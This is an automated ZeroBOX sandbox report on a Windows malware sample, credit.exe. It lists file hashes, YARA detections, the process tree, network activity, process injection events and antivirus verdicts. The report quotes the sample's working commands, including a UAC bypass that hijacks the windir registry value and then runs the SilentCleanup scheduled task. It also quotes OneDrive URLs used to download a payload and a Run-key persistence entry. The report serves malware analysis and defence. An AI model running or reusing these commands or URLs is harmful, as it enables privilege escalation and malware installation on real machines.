Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 30, 2021, 11:47 a.m.	July 30, 2021, 11:50 a.m.

Size	1.0MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`821e75318f291ec08bafe26ceb1eeeff`
SHA256	`e1686c75b6d0982c533063557289dd24d66ba74a9dd37cd5d328c3451035a01f`
CRC32	`686630BB`
ssdeep	`12288:Emt6Xn/fYF7E9rTdcDNVn14ZNBehaSXYG0aAJ92PHiLeN0aSy3V6+1G6W:xt0XnVcDNcm7JBa2HKaLFt`
Yara	IsPE32 - (no description) UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature

credit.exe "C:\Users\test22\AppData\Local\Temp\credit.exe"
1596
- cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
  2480
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
    2540
    - reg.exe reg delete hkcu\Environment /v windir /f
      2624
    - reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
      2668
    - schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      2712
- cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
  3048
  - reg.exe reg delete hkcu\Environment /v windir /f
    2124

Name	Response	Post-Analysis Lookup
zya3ig.sn.files.1drv.com	CNAME odc-sn-files-geo.onedrive.akadns.net CNAME sn-files.fe.1drv.com CNAME sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net A 13.107.42.12 CNAME odc-sn-files-brs.onedrive.akadns.net CNAME l-0003.l-msedge.net	13.107.42.12
onedrive.live.com	CNAME odc-web-geo.onedrive.akadns.net CNAME l-0004.l-msedge.net A 13.107.42.13 CNAME odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net CNAME odc-web-brs.onedrive.akadns.net	13.107.42.13

IP Address	Status	Action
13.107.42.12	Active	Moloch
13.107.42.13	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49163 -> 13.107.42.13:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49165 -> 13.107.42.13:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49164 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49163 13.107.42.13:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=onedrive.com	24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de
TLSv1 192.168.56.102:49165 13.107.42.13:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=onedrive.com	24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de
TLSv1 192.168.56.102:49164 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLSv1 192.168.56.102:49166 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 30, 2021, 11:48 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: /min reg delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 11:48 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (3 events)

request	GET https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21106&authkey=ABWUN04e3lg3neg
request	GET https://zya3ig.sn.files.1drv.com/y4mJJ5fYOJj8MPGeOKGqQ1KM13fmel2Ir5INpKatMQNhtn-MFo22uJXG-NxHGQW_rIE_QimVyEKqc1UAQnleBjY5UihcDrpL6Eb2Ifa9I_Ol5syVmMwJVuBJjBf1MYv7UrCewNZWHZNelLV4zk5t7MMv7dryPakEqTM3AMwvnh0KRMGP3mPCri2oJ3PakOXO5685tSRfDtd09gIy5zXW-F5cA/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1
request	GET https://zya3ig.sn.files.1drv.com/y4md6gQPdIz35OSr1CP2N4-V0otIFa4eVa0izCLdmOuJBlLjvqOKL1As6rYQnYlPRdOKogUyQE7YlWy1lWOD4q-yUycJQpPxTSjhLp1ipDwl2VxJzzfz4_HgHLeaZnxv5_IXieI4bUFSOayiOt7gTLafGswW8XOo0GN6ewIHl1Xv5d3ZoJJCQW6vuIZ2DO7Z-CXZhd8Pay1cNIMOtYXsZ6jSw/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 30, 2021, 11:47 a.m.	process_identifier: 1596 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 11:47 a.m.	process_identifier: 1596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 1596 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 1596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 495616 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10591000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\Public\KDECO.bat
file	C:\Users\Public\UKO.bat
file	C:\Users\Public\Libraries\Boplulw\Boplulw.exe
file	C:\Users\Public\Trast.bat
file	C:\Users\Public\nest.bat

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 1596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 94208 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x049d1000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (50 out of 60 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	reg delete hkcu\Environment /v windir /f
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 06d100b6739d81d24681303d479d1c3f0c3141e6

Allocates execute permission to another process indicative of possible code injection (12 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00010000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00230000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00290000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Boplulw

reg_value

C:\Users\Public\Libraries\wlulpoB.url

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1596 created a remote thread in non-child process 2428
CreateRemoteThread July 30, 2021, 11:48 a.m.	thread_identifier: 2464 process_identifier: 2428 function_address: 0x000b0000 flags: 0 stack_size: 0 parameter: 0x00000000 process_handle: 0x00000198	1	1368	0
CreateRemoteThread July 30, 2021, 11:48 a.m.	thread_identifier: 2468 process_identifier: 2428 function_address: 0x00010000 flags: 0 stack_size: 0 parameter: 0x000e0000 process_handle: 0x00000198	1	1368	0
CreateRemoteThread July 30, 2021, 11:48 a.m.	thread_identifier: 2472 process_identifier: 2428 function_address: 0x00260000 flags: 0 stack_size: 0 parameter: 0x00250000 process_handle: 0x00000198	1	1364	0
CreateRemoteThread July 30, 2021, 11:48 a.m.	thread_identifier: 2476 process_identifier: 2428 function_address: 0x00290000 flags: 0 stack_size: 0 parameter: 0x00270000 process_handle: 0x00000198	1	1372	0

Manipulates memory of a non-child process indicative of process injection (13 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1596 manipulating memory of non-child process 2428
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00010000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00230000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0
NtAllocateVirtualMemory July 30, 2021, 11:48 a.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00290000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000198	1	0	0

Potential code injection by writing to the memory of another process (12 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1596 injected into non-child 2428
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: hÿhÿ×IuÕwkernel32.dllÿ0ûKPúK¾ttúKÉtpý~dúKlatQytpý~úK:t6;tûKmØtØúKØúKÿÿÿÿDûK0ûK?ÿ$ ûK,%èúKÿÿ ûKQAYATûKäE base_address: 0x000b0000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: GetProcAddress base_address: 0x000c0000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: kernel32.dll base_address: 0x000d0000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: Õw"uEu base_address: 0x000e0000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIhØIèEÿÿPèGÿÿEèhèIhØIè-ÿÿPè/ÿÿEähøIhØIèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00010000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: LoadLibraryA base_address: 0x00230000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: kernel32.dll base_address: 0x00240000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: Õw"uEu$# base_address: 0x00250000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIhØIèEÿÿPèGÿÿEèhèIhØIè-ÿÿPè/ÿÿEähøIhØIèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00260000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: YY base_address: 0x00270000 process_identifier: 2428 process_handle: 0x00000198	1	1	0
WriteProcessMemory July 30, 2021, 11:48 a.m.	buffer: UìÄøEUøPUü1ÀPjÿuøÿUüYY]Â@UìÄÔSVWúðEÔô?è5ÿÿ3ÀUh½Hdÿ0d ÆEÿG<ÇEô»Ãj@h0Eô@PPEô@4ÃPèÿÿEð}ðt0hjEðPèÿÿj@h0Eô@PPEô@4ÃPVèâÿÿEð}ðuû0vEÔPÏUðÆèEÔÀt7EèUàUìUøRUØRPEðPVèÖÿÿjjMèºGÆè_ýÿÿÀtÆEÿ3ÀZYYdhÄHEÔô?èÿÿÃ base_address: 0x00290000 process_identifier: 2428 process_handle: 0x00000198	1	1	0

Network activity contains more than one unique useragent (2 events)

process	credit.exe				useragent	zipo
process	credit.exe				useragent	aswe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2480 resumed a thread in remote process 2540
Process injection	Process 3048 resumed a thread in remote process 2124
NtResumeThread July 30, 2021, 11:48 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2540	1	0	0
NtResumeThread July 30, 2021, 11:48 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2124	1	0	0

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

Lionic	Trojan.Win32.Androm.m!c
Elastic	malicious (high confidence)
McAfee	Artemis!821E75318F29
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/GenKryptik.FHVJ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	VHO:Backdoor.Win32.Androm.gen
Avast	FileRepMalware
McAfee-GW-Edition	BehavesLike.Win32.Worm.th
Sophos	Generic ML PUA (PUA)
Kingsoft	Win32.Hack.Undef.(kcloud)
Microsoft	Trojan:Win32/Fareit!ml
Cynet	Malicious (score: 100)
BitDefenderTheta	Gen:NN.ZelphiF.34050.bHW@aaKucxfi
Ikarus	Win32.Outbreak
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/GenKryptik.FHVJ!tr
Webroot	W32.Malware.gen
AVG	FileRepMalware

credit.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All